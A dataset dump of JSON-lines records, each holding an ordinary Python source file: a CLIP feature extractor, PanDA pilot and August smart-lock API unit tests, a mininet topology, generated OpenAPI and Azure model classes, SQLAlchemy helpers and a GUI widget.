** 2]\n x = x.permute(0, 2, 1) # shape = [*, grid ** 2, width]\n x = torch.cat([model.visual.class_embedding.to(x.dtype) + torch.zeros(x.shape[0], 1, x.shape[-1], dtype=x.dtype, device=x.device), x], dim=1) # shape = [*, grid ** 2 + 1, width]\n x = x + 
model.visual.positional_embedding.to(x.dtype)[:x.shape[1], :]\n x = model.visual.ln_pre(x)\n\n x = x.permute(1, 0, 2) # NLD -> LND\n\n for layer_idx, layer in enumerate(model.visual.transformer.resblocks):\n if layer_idx != 11:\n x = layer(x) \n\n outputs = x.permute(1, 0, 2)\n\n \n if \"RN\" in args.model_type:\n outputs = outputs.permute(0, 2, 3, 1)\n else:\n outputs = outputs[:, 1:, :].reshape(1, 18, 31, 768)\n \n\n with PathManager.open(os.path.join(dump_folder, file_name), \"wb\") as f:\n # save as CPU tensors\n np.save(f, outputs.float().cpu().numpy())\n\ndef main(args):\n cfg = setup(args)\n if args.model_type != 'vit_base_patch32_224_in21k':\n model, transform = load(args.model_type, jit=False) \n else:\n model = timm.create_model(args.model_type, pretrained=True)\n model = model.cuda()\n \n do_feature_extraction(cfg, model, args.dataset, args)\n\n\nif __name__ == \"__main__\":\n args = extract_grid_feature_argument_parser().parse_args()\n print(\"Command Line Args:\", args)\n main(args)\n"} {"ext": "py", "sha": "1a2f78bddc95220e0649a236efd36e6f5f82c8ab", "content": "# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Authors:\n# - Wen Guan, wen.guan@cern.ch, 2018\n\nimport json\nimport logging\nimport os\nimport socket\nimport sys\nimport time\n\nfrom pilot.eventservice.communicationmanager.communicationmanager import CommunicationRequest, CommunicationResponse, CommunicationManager\nfrom pilot.util.https import https_setup\nfrom pilot.util.timing import time_stamp\n\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\nlogging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\n\nhttps_setup(None, None)\n\n\ndef check_env():\n \"\"\"\n Function to check whether cvmfs is available.\n To be used to decide whether to skip some test functions.\n\n :returns True: if cvmfs is available. 
Otherwise False.\n \"\"\"\n return os.path.exists('/cvmfs/atlas.cern.ch/repo/')\n\n\nclass TestESCommunicationrRequestResponse(unittest.TestCase):\n \"\"\"\n Unit tests for event service communicator Request and Response.\n \"\"\"\n\n def test_communicator_request(self):\n \"\"\"\n Make sure that es message thread works as expected.\n \"\"\"\n req_attrs = {'request_type': CommunicationRequest.RequestType.RequestJobs,\n 'num_jobs': 1, 'post_hook': None, 'response': None}\n req_job = CommunicationRequest(req_attrs)\n self.assertEqual(req_job.request_type, CommunicationRequest.RequestType.RequestJobs)\n\n req_attrs = {'request_type': CommunicationRequest.RequestType.RequestEvents,\n 'num_event_ranges': 1, 'post_hook': None, 'response': None}\n req_events = CommunicationRequest(req_attrs)\n self.assertEqual(req_events.request_type, CommunicationRequest.RequestType.RequestEvents)\n\n req_attrs = {'request_type': CommunicationRequest.RequestType.UpdateEvents,\n 'output_files': None, 'post_hook': None, 'response': None}\n req_output = CommunicationRequest(req_attrs)\n self.assertEqual(req_output.request_type, CommunicationRequest.RequestType.UpdateEvents)\n\n resp_attrs = {'status': 0, 'content': None, 'exception': None}\n resp = CommunicationResponse(resp_attrs)\n self.assertEqual(resp.status, 0)\n\n\nclass TestESCommunicationManagerPanda(unittest.TestCase):\n \"\"\"\n Unit tests for event service communicator manager.\n \"\"\"\n\n @unittest.skipIf(not check_env(), \"No CVMFS\")\n def test_communicator_manager(self):\n \"\"\"\n Make sure that es communicator manager thread works as expected.\n \"\"\"\n communicator_manager = None\n try:\n args = {'workflow': 'eventservice_hpc',\n 'queue': 'BNL_CLOUD_MCORE',\n 'site': 'BNL_CLOUD_MCORE',\n 'port': 25443,\n 'url': 'https://aipanda007.cern.ch',\n 'job_label': 'ptest',\n 'pilot_user': 'ATLAS',\n 'node': socket.getfqdn(),\n 'mem': 16000,\n 'disk_space': 160000,\n 'working_group': '',\n 'cpu': 2601.0,\n 'info': None}\n\n communicator_manager = CommunicationManager()\n communicator_manager.start()\n self.assertTrue(communicator_manager.is_alive())\n\n jobs = communicator_manager.get_jobs(njobs=2, args=args)\n self.assertEqual(len(jobs), 2)\n\n jobs = communicator_manager.get_jobs(njobs=1, args=args)\n self.assertEqual(len(jobs), 1)\n\n job_list = []\n for job in jobs:\n job_data = {'node': socket.getfqdn(),\n 'pilotErrorCode': 0,\n 'startTime': time.time(),\n 'jobMetrics': 'coreCount=8',\n 'schedulerID': 'unknown',\n 'timestamp': time_stamp(),\n 'exeErrorCode': 0,\n 'pilotID': 'unknown|PR|2.0.0 (80)',\n 'transExitCode': 0,\n 'pilotErrorDiag': '',\n 'exeErrorDiag': ''}\n job_data['jobId'] = job['PandaID']\n job_data['siteName'] = 'BNL_CLOUD_MCORE'\n job_data['state'] = 'running'\n job_data['attemptNr'] = job['attemptNr'] + 1\n job_list.append(job_data)\n status = communicator_manager.update_jobs(jobs=job_list)\n self.assertEqual(status[0], True)\n\n events = communicator_manager.get_event_ranges(num_event_ranges=1, job=jobs[0])\n self.assertEqual(len(events), 1)\n\n for event in events:\n event_range_status = {\"errorCode\": 1220, \"eventRangeID\": event['eventRangeID'], \"eventStatus\": 'failed'}\n event_range_message = {'version': 0, 'eventRanges': json.dumps(event_range_status)}\n res = communicator_manager.update_events(update_events=event_range_message)\n self.assertEqual(res['StatusCode'], 0)\n\n events = communicator_manager.get_event_ranges(num_event_ranges=2, job=jobs[0])\n self.assertEqual(len(events), 2)\n\n update_events = []\n for event in 
events:\n event_range = {\"eventRangeID\": event['eventRangeID'], \"eventStatus\": 'finished'}\n update_events.append(event_range)\n event_range_status = [{\"zipFile\": {\"numEvents\": len(update_events),\n \"objstoreID\": 1318,\n \"adler32\": '000000',\n \"lfn\": 'test_file',\n \"fsize\": 100,\n \"pathConvention\": 1000},\n \"eventRanges\": update_events}]\n\n event_range_message = {'version': 1, 'eventRanges': json.dumps(event_range_status)}\n res = communicator_manager.update_events(update_events=event_range_message)\n self.assertEqual(res['StatusCode'], 0)\n\n communicator_manager.stop()\n time.sleep(2)\n self.assertFalse(communicator_manager.is_alive())\n except Exception as ex:\n if communicator_manager:\n communicator_manager.stop()\n raise ex\n"} {"ext": "py", "sha": "1a2f79211a981df605f777d54bf91b6cdc9b7585", "content": "\"\"\"\nswat-s1 topology\n\"\"\"\n\nfrom mininet.topo import Topo as TopoBase\n\nfrom srve import Srve\nfrom clie import Clie\n\nclass Topoe(TopoBase):\n NETMASK = '/24'\n NODES = [Srve, Clie]\n\n def build(self):\n\n switch = self.addSwitch('s1')\n\n for node in Topoe.NODES:\n host = self.addHost(\n node.NAME,\n ip=node.IP + Topoe.NETMASK,\n mac=node.MAC)\n self.addLink(host, switch)\n"} {"ext": "py", "sha": "1a2f7a212ac92f228456c65764e952ea192e27f2", "content": "# type: ignore[attr-defined]\nfrom solids import example_two_solid # pylint: disable=no-name-in-module\n\nfrom dagster import pipeline\n\n\n@pipeline\ndef example_two_pipeline():\n example_two_solid()\n"} {"ext": "py", "sha": "1a2f7a2694a13bd2fa3ec9c15e13fbabb9667170", "content": "\"\"\"\n MSX SDK\n\n MSX SDK client. # noqa: E501\n\n The version of the OpenAPI document: 1.0.9\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport re # noqa: F401\nimport sys # noqa: F401\n\nfrom python_msx_sdk.model_utils import ( # noqa: F401\n ApiTypeError,\n ModelComposed,\n ModelNormal,\n ModelSimple,\n cached_property,\n change_keys_js_to_python,\n convert_js_args_to_python_args,\n date,\n datetime,\n file_type,\n none_type,\n validate_get_composed_info,\n)\n\n\nclass GenericEventSecurity(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). 
The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {\n }\n\n validations = {\n }\n\n additional_properties_type = None\n\n _nullable = False\n\n @cached_property\n def openapi_types():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n return {\n 'client_id': (str,), # noqa: E501\n 'user_id': (str,), # noqa: E501\n 'username': (str,), # noqa: E501\n 'tenant_id': (str,), # noqa: E501\n 'tenant_name': (str,), # noqa: E501\n 'provider_id': (str,), # noqa: E501\n 'original_username': (str,), # noqa: E501\n }\n\n @cached_property\n def discriminator():\n return None\n\n\n attribute_map = {\n 'client_id': 'clientId', # noqa: E501\n 'user_id': 'userId', # noqa: E501\n 'username': 'username', # noqa: E501\n 'tenant_id': 'tenantId', # noqa: E501\n 'tenant_name': 'tenantName', # noqa: E501\n 'provider_id': 'providerId', # noqa: E501\n 'original_username': 'originalUsername', # noqa: E501\n }\n\n _composed_schemas = {}\n\n required_properties = set([\n '_data_store',\n '_check_type',\n '_spec_property_naming',\n '_path_to_item',\n '_configuration',\n '_visited_composed_classes',\n ])\n\n @convert_js_args_to_python_args\n def __init__(self, *args, **kwargs): # noqa: E501\n \"\"\"GenericEventSecurity - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. 
snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n client_id (str): [optional] # noqa: E501\n user_id (str): [optional] # noqa: E501\n username (str): [optional] # noqa: E501\n tenant_id (str): [optional] # noqa: E501\n tenant_name (str): [optional] # noqa: E501\n provider_id (str): [optional] # noqa: E501\n original_username (str): [optional] # noqa: E501\n \"\"\"\n\n _check_type = kwargs.pop('_check_type', True)\n _spec_property_naming = kwargs.pop('_spec_property_naming', False)\n _path_to_item = kwargs.pop('_path_to_item', ())\n _configuration = kwargs.pop('_configuration', None)\n _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())\n\n if args:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.\" % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n for var_name, var_value in kwargs.items():\n if var_name not in self.attribute_map and \\\n self._configuration is not None and \\\n self._configuration.discard_unknown_keys and \\\n self.additional_properties_type is None:\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n"} {"ext": "py", "sha": "1a2f7a2dd3ba13c02f9753f956bad38c6cb3d724", "content": "import typing\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import OperationalError\n\nfrom db_workers import DatabaseWorker\nfrom db_workers import MySQLWorker\nfrom db_workers import PostgreWorker\nfrom fields import DATABASE_NAME_FIELD_NAME\nfrom fields import FOLDER_NAME_FIELD_NAME\nfrom fields import LOCAL_TABLE_NAME_FILED_NAME\nfrom fields import TABLE_NAME_FIELD_NAME\n\n\ndef validate_get_data_request_body(\n required_fields: list, request_body: dict, local_db_worker\n) -> dict:\n # Check if all fields defined\n for f in required_fields:\n if f not in request_body:\n raise KeyError(f\"Field {f} not defined in request\")\n\n # If columns defined - check if all exits in database\n if \"columns\" in request_body:\n table_data = local_db_worker.get_table(local_table_name=request_body[\"table\"])\n for col in request_body[\"columns\"]:\n if col not in table_data.columns:\n KeyError(f\"Column {col} not found in table {request_body['table']}\")\n\n # If limit defined - check that it can be converter to float\n if \"limit\" in request_body:\n request_body[\"limit\"] = float(request_body[\"limit\"])\n\n return request_body\n\n\ndef 
get_existing_data(\n sql_session, table_class_object, target_attr: str = None\n) -> typing.List:\n if not getattr(table_class_object, \"__tablename__\"):\n raise ValueError(\"Получен неверный table_class_object.\")\n\n try:\n data = sql_session.query(table_class_object).all()\n except: # noqa: E722\n sql_session.rollback()\n\n return [getattr(i, target_attr) for i in data] if target_attr else data\n\n\ndef get_local_table_name_from_request(request_body: dict, local_worker):\n return (\n request_body[LOCAL_TABLE_NAME_FILED_NAME]\n if LOCAL_TABLE_NAME_FILED_NAME in request_body\n else local_worker.get_local_table_name(\n database_name=request_body[DATABASE_NAME_FIELD_NAME],\n folder_name=request_body[FOLDER_NAME_FIELD_NAME],\n table_name=request_body[TABLE_NAME_FIELD_NAME],\n )\n )\n\n\ndef get_worker(db_type: str) -> typing.Type[DatabaseWorker]: # noqa: TYP006\n if db_type == \"postgres\":\n return PostgreWorker\n elif db_type == \"mysql\":\n return MySQLWorker\n\n\ndef database_health_check(engine) -> bool:\n try:\n engine.connect()\n return True\n except OperationalError:\n return False\n\n\ndef get_db_engine(db_type: str, **con_params):\n if db_type == \"postgres\":\n return create_engine(\n f\"postgresql://{con_params.get('username')}:{con_params.get('password')}@\"\n f\"{con_params.get('ip')}:{con_params.get('port')}/{con_params.get('database')}\"\n )\n elif db_type == \"mysql\":\n return create_engine(\n f\"mysql://{con_params.get('username')}:{con_params.get('password')}@\"\n f\"{con_params.get('ip')}:{con_params.get('port')}/{con_params.get('database')}\"\n )\n\n\ndef get_bad_request_answer() -> list:\n return [{\"status\": \"error\", \"message\": \"Incorrect request\"}, 400]\n\n\ndef update_data_about_db_structure(local_worker):\n \"\"\"\n This function iterates through all databases and refreshes its structure data (about tables/schemas)\n :param local_worker: object of LocalBaseWorker\n \"\"\"\n for local_base_name in local_worker.get_db_name_list():\n db_type = local_worker.get_database_object(local_base_name).type\n worker = get_worker(db_type)(local_base_name, local_worker)\n tables = worker.download_table_list()\n\n # After rescan add grant access for admin tokens\n for token_obj in local_worker.get_admin_tokens_objects_list():\n\n token = token_obj.token\n\n for local_table_name in tables:\n if local_table_name not in list(token_obj.granted_tables):\n local_worker.add_table_for_token(\n token, local_table_name=local_table_name\n )\n"} {"ext": "py", "sha": "1a2f7a63cc38b8b547f26d1bba451999cce801a8", "content": "from . 
import losses, layers\n"} {"ext": "py", "sha": "1a2f7c0f84f644a7c275dcc3f9d9319e214a6e7d", "content": "import os\nimport unittest\nfrom datetime import datetime\n\nimport requests_mock\nfrom dateutil.tz import tzutc\n\nfrom august.api import API_GET_DOORBELLS_URL, Api, API_GET_LOCKS_URL, \\\n API_GET_LOCK_STATUS_URL, API_LOCK_URL, API_UNLOCK_URL, API_GET_LOCK_URL, \\\n API_GET_DOORBELL_URL, API_GET_PINS_URL\nfrom august.lock import LockStatus, LockDoorStatus\n\nACCESS_TOKEN = \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9\"\n\n\ndef load_fixture(filename):\n \"\"\"Load a fixture.\"\"\"\n path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)\n with open(path) as fptr:\n return fptr.read()\n\n\ndef utc_of(year, month, day, hour, minute, second, microsecond):\n return datetime(year, month, day, hour, minute, second, microsecond,\n tzinfo=tzutc())\n\n\nclass TestApi(unittest.TestCase):\n @requests_mock.Mocker()\n def test_get_doorbells(self, mock):\n mock.register_uri(\n \"get\",\n API_GET_DOORBELLS_URL,\n text=load_fixture(\"get_doorbells.json\"))\n\n api = Api()\n doorbells = sorted(api.get_doorbells(ACCESS_TOKEN),\n key=lambda d: d.device_id)\n\n self.assertEqual(2, len(doorbells))\n\n first = doorbells[0]\n self.assertEqual(\"1KDAbJH89XYZ\", first.device_id)\n self.assertEqual(\"aaaaR08888\", first.serial_number)\n self.assertEqual(\"Back Door\", first.device_name)\n self.assertEqual(\"doorbell_call_status_offline\", first.status)\n self.assertEqual(False, first.has_subscription)\n self.assertEqual(None, first.image_url)\n self.assertEqual(\"3dd2accadddd\", first.house_id)\n\n second = doorbells[1]\n self.assertEqual(\"K98GiDT45GUL\", second.device_id)\n self.assertEqual(\"tBXZR0Z35E\", second.serial_number)\n self.assertEqual(\"Front Door\", second.device_name)\n self.assertEqual(\"doorbell_call_status_online\", second.status)\n self.assertEqual(True, second.has_subscription)\n self.assertEqual(\"https://image.com/vmk16naaaa7ibuey7sar.jpg\",\n second.image_url)\n self.assertEqual(\"3dd2accaea08\", second.house_id)\n\n @requests_mock.Mocker()\n def test_get_doorbell_detail(self, mock):\n mock.register_uri(\n \"get\",\n API_GET_DOORBELL_URL.format(doorbell_id=\"K98GiDT45GUL\"),\n text=load_fixture(\"get_doorbell.json\"))\n\n api = Api()\n doorbell = api.get_doorbell_detail(ACCESS_TOKEN, \"K98GiDT45GUL\")\n\n self.assertEqual(\"K98GiDT45GUL\", doorbell.device_id)\n self.assertEqual(\"Front Door\", doorbell.device_name)\n self.assertEqual(\"3dd2accaea08\", doorbell.house_id)\n self.assertEqual(\"tBXZR0Z35E\", doorbell.serial_number)\n self.assertEqual(\"2.3.0-RC153+201711151527\", doorbell.firmware_version)\n self.assertEqual(\"doorbell_call_status_online\", doorbell.status)\n self.assertEqual(True, doorbell.is_online)\n self.assertEqual(True, doorbell.has_subscription)\n self.assertEqual(\"https://image.com/vmk16naaaa7ibuey7sar.jpg\",\n doorbell.image_url)\n\n @requests_mock.Mocker()\n def test_get_locks(self, mock):\n mock.register_uri(\n \"get\",\n API_GET_LOCKS_URL,\n text=load_fixture(\"get_locks.json\"))\n\n api = Api()\n locks = sorted(api.get_locks(ACCESS_TOKEN), key=lambda d: d.device_id)\n\n self.assertEqual(2, len(locks))\n\n first = locks[0]\n self.assertEqual(\"A6697750D607098BAE8D6BAA11EF8063\", first.device_id)\n self.assertEqual(\"Front Door Lock\", first.device_name)\n self.assertEqual(\"000000000000\", first.house_id)\n self.assertEqual(True, first.is_operable)\n\n second = locks[1]\n self.assertEqual(\"A6697750D607098BAE8D6BAA11EF9999\", second.device_id)\n 
self.assertEqual(\"Back Door Lock\", second.device_name)\n self.assertEqual(\"000000000011\", second.house_id)\n self.assertEqual(False, second.is_operable)\n\n @requests_mock.Mocker()\n def test_get_operable_locks(self, mock):\n mock.register_uri(\n \"get\",\n API_GET_LOCKS_URL,\n text=load_fixture(\"get_locks.json\"))\n\n api = Api()\n locks = api.get_operable_locks(ACCESS_TOKEN)\n\n self.assertEqual(1, len(locks))\n\n first = locks[0]\n self.assertEqual(\"A6697750D607098BAE8D6BAA11EF8063\", first.device_id)\n self.assertEqual(\"Front Door Lock\", first.device_name)\n self.assertEqual(\"000000000000\", first.house_id)\n self.assertEqual(True, first.is_operable)\n\n @requests_mock.Mocker()\n def test_get_lock_detail(self, mock):\n mock.register_uri(\n \"get\",\n API_GET_LOCK_URL.format(\n lock_id=\"A6697750D607098BAE8D6BAA11EF8063\"),\n text=load_fixture(\"get_lock.json\"))\n\n api = Api()\n lock = api.get_lock_detail(ACCESS_TOKEN,\n \"A6697750D607098BAE8D6BAA11EF8063\")\n\n self.assertEqual(\"A6697750D607098BAE8D6BAA11EF8063\", lock.device_id)\n self.assertEqual(\"Front Door Lock\", lock.device_name)\n self.assertEqual(\"000000000000\", lock.house_id)\n self.assertEqual(\"X2FSW05DGA\", lock.serial_number)\n self.assertEqual(\"109717e9-3.0.44-3.0.30\", lock.firmware_version)\n self.assertEqual(88, lock.battery_level)\n self.assertEqual(\"Medium\", lock.keypad.battery_level)\n self.assertEqual(\"5bc65c24e6ef2a263e1450a8\", lock.keypad.device_id)\n\n @requests_mock.Mocker()\n def test_get_lock_status_with_locked_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"kAugLockState_Locked\\\"}\")\n\n api = Api()\n status = api.get_lock_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockStatus.LOCKED, status)\n\n @requests_mock.Mocker()\n def test_get_lock_and_door_status_with_locked_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"kAugLockState_Locked\\\"\"\n \",\\\"doorState\\\": \\\"kAugLockDoorState_Closed\\\"}\")\n\n api = Api()\n status, door_status = api.get_lock_status(ACCESS_TOKEN, lock_id, True)\n\n self.assertEqual(LockStatus.LOCKED, status)\n self.assertEqual(LockDoorStatus.CLOSED, door_status)\n\n @requests_mock.Mocker()\n def test_get_lock_status_with_unlocked_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"kAugLockState_Unlocked\\\"}\")\n\n api = Api()\n status = api.get_lock_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockStatus.UNLOCKED, status)\n\n @requests_mock.Mocker()\n def test_get_lock_status_with_unknown_status_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"not_advertising\\\"}\")\n\n api = Api()\n status = api.get_lock_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockStatus.UNKNOWN, status)\n\n @requests_mock.Mocker()\n def test_get_lock_door_status_with_closed_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"doorState\\\": \\\"kAugLockDoorState_Closed\\\"}\")\n\n api = Api()\n door_status = api.get_lock_door_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockDoorStatus.CLOSED, door_status)\n\n @requests_mock.Mocker()\n def 
test_get_lock_door_status_with_open_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"doorState\\\": \\\"kAugLockDoorState_Open\\\"}\")\n\n api = Api()\n door_status = api.get_lock_door_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockDoorStatus.OPEN, door_status)\n\n @requests_mock.Mocker()\n def test_get_lock_and_door_status_with_open_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"kAugLockState_Unlocked\\\"\"\n \",\\\"doorState\\\": \\\"kAugLockDoorState_Open\\\"}\")\n\n api = Api()\n door_status, status = api.get_lock_door_status(ACCESS_TOKEN, lock_id,\n True)\n\n self.assertEqual(LockDoorStatus.OPEN, door_status)\n self.assertEqual(LockStatus.UNLOCKED, status)\n\n @requests_mock.Mocker()\n def test_get_lock_door_status_with_unknown_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"doorState\\\": \\\"not_advertising\\\"}\")\n\n api = Api()\n door_status = api.get_lock_door_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockDoorStatus.UNKNOWN, door_status)\n\n @requests_mock.Mocker()\n def test_lock(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"put\",\n API_LOCK_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\":\\\"locked\\\",\"\n \"\\\"dateTime\\\":\\\"2017-12-10T07:43:39.056Z\\\",\"\n \"\\\"isLockStatusChanged\\\":false,\"\n \"\\\"valid\\\":true}\")\n\n api = Api()\n status = api.lock(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockStatus.LOCKED, status)\n\n @requests_mock.Mocker()\n def test_unlock(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"put\",\n API_UNLOCK_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"unlocked\\\"}\")\n\n api = Api()\n status = api.unlock(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockStatus.UNLOCKED, status)\n\n @requests_mock.Mocker()\n def test_get_pins(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_PINS_URL.format(lock_id=lock_id),\n text=load_fixture(\"get_pins.json\"))\n\n api = Api()\n pins = api.get_pins(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(1, len(pins))\n\n first = pins[0]\n self.assertEqual(\"epoZ87XSPqxlFdsaYyJiRRVR\", first.pin_id)\n self.assertEqual(\"A6697750D607098BAE8D6BAA11EF8063\", first.lock_id)\n self.assertEqual(\"c3b3a94f-473z-61a3-a8d1-a6e99482787a\", first.user_id)\n self.assertEqual(\"in-use\", first.state)\n self.assertEqual(\"123456\", first.pin)\n self.assertEqual(646545456465161, first.slot)\n self.assertEqual(\"one-time\", first.access_type)\n self.assertEqual(\"John\", first.first_name)\n self.assertEqual(\"Doe\", first.last_name)\n self.assertEqual(True, first.unverified)\n self.assertEqual(utc_of(2016, 11, 26, 22, 27, 11, 176000),\n first.created_at)\n self.assertEqual(utc_of(2017, 11, 23, 00, 42, 19, 470000),\n first.updated_at)\n self.assertEqual(utc_of(2017, 12, 10, 3, 12, 55, 563000),\n first.loaded_date)\n self.assertEqual(utc_of(2018, 1, 1, 1, 1, 1, 563000),\n first.access_start_time)\n self.assertEqual(utc_of(2018, 12, 1, 1, 1, 1, 563000),\n first.access_end_time)\n self.assertEqual(utc_of(2018, 11, 5, 10, 2, 41, 684000),\n first.access_times)\n"} {"ext": "py", "sha": "1a2f7c408e191d644b96e8c0d1b6b78823f95403", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. 
All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass SsoUri(Model):\n \"\"\"The URI required to login to the supplemental portal from the Azure portal.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :ivar sso_uri_value: The URI used to login to the supplemental portal.\n :vartype sso_uri_value: str\n \"\"\"\n\n _validation = {\n 'sso_uri_value': {'readonly': True},\n }\n\n _attribute_map = {\n 'sso_uri_value': {'key': 'ssoUriValue', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(SsoUri, self).__init__(**kwargs)\n self.sso_uri_value = None\n"} {"ext": "py", "sha": "1a2f7e4e526e3e92e2a43901f135e68cba2e1455", "content": "#------------------------------------------------------------------------------\n# Copyright (c) 2005, Enthought, Inc.\n# All rights reserved.\n# \n# This software is provided without warranty under the terms of the BSD\n# license included in enthought/LICENSE.txt and may be redistributed only\n# under the conditions described in the aforementioned license. The license\n# is also available online at http://www.enthought.com/licenses/BSD.txt\n# Thanks for using Enthought open source!\n# \n# Author: David C. Morrill\n# Date: 12/02/2004\n# Description: Defines a Tkinter ImageControl widget that is used by various\n# trait editors to display trait values iconically.\n#\n# Symbols defined: ImageControl\n#\n#------------------------------------------------------------------------------\n\n#-------------------------------------------------------------------------------\n# Imports:\n#-------------------------------------------------------------------------------\n \nimport tk\n\n#-------------------------------------------------------------------------------\n# 'ImageControl' class:\n#-------------------------------------------------------------------------------\n \nclass ImageControl ( wx.Window ):\n\n # Pens used to draw the 'selection' marker:\n _selectedPenDark = wx.Pen( \n wx.SystemSettings_GetColour( wx.SYS_COLOUR_3DSHADOW ), 1, \n wx.SOLID )\n _selectedPenLight = wx.Pen( \n wx.SystemSettings_GetColour( wx.SYS_COLOUR_3DHIGHLIGHT ), 1, \n wx.SOLID )\n \n #---------------------------------------------------------------------------\n # Initializes the object:\n #---------------------------------------------------------------------------\n \n def __init__ ( self, parent, bitmap, selected = None, handler = None ):\n \"\"\" Initializes the object.\n \"\"\"\n wx.Window.__init__( self, parent, -1, \n size = wx.Size( bitmap.GetWidth() + 10, \n bitmap.GetHeight() + 10 ) )\n self._bitmap = bitmap\n self._selected = selected\n self._handler = handler\n self._mouse_over = False\n self._button_down = False\n \n # Set up the 'paint' event handler:\n wx.EVT_PAINT( self, self._on_paint )\n \n # Set up mouse event handlers:\n wx.EVT_LEFT_DOWN( self, self._on_left_down )\n wx.EVT_LEFT_UP( self, self._on_left_up )\n wx.EVT_ENTER_WINDOW( self, self._on_enter )\n wx.EVT_LEAVE_WINDOW( self, self._on_leave )\n \n #---------------------------------------------------------------------------\n # Gets/Sets the current selection state of the image: \n 
